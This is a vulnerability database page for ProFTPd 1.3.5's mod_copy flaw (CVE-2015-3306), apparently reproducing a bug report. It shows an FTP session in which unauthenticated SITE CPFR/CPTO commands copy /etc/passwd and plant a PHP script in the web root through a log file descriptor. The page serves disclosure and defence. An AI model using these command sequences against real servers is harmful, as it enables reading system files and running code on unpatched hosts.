Vulners
Lucene search
ProFTPd 1.3.5 File Copy
🗓️ 18 Apr 2015 00:00:00Reported by Packet StormType 
packetstorm🔗 packetstormsecurity.com👁 1288 Views
| Reporter | Title | Published | Views | Family All 65 |
|---|---|---|---|---|
 | Exploit for Improper Access Control in Proftpd | 2 Nov 202520:36 | – | githubexploit |
| Exploit for CVE-1999-0368 | 17 Feb 202615:41 | – | githubexploit |
| Exploit for Improper Access Control in Proftpd | 3 Jun 202613:18 | – | githubexploit |
| Exploit for Improper Access Control in Proftpd | 8 Jan 201714:19 | – | githubexploit |
 | ProFTPd 1.3.5 - Remote Command Execution Exploit | 21 Apr 201500:00 | – | zdt |
| ProFTPD 1.3.5 Mod_Copy Command Execution Exploit | 10 Jun 201500:00 | – | zdt |
| ProFTPd 1.3.5 - (mod_copy) Remote Command Execution Exploit (2) | 26 May 202100:00 | – | zdt |
 | The vulnerability of the FTP server ProFTPD, which allows a remote intruder to gain access to protected information | 5 Jun 201500:00 | – | bdu_fstec |
 | CVE-2015-3306 | 13 Apr 201500:00 | – | circl |
 | ProFTPd (mod_copy) Remote Command Execution Vulnerability | 24 Apr 201500:00 | – | cnvd |
10
`Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------
He provides another, scarier example:
------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php
test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------
test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter
Source: http://bugs.proftpd.org/show_bug.cgi?id=4169
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2015 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.96803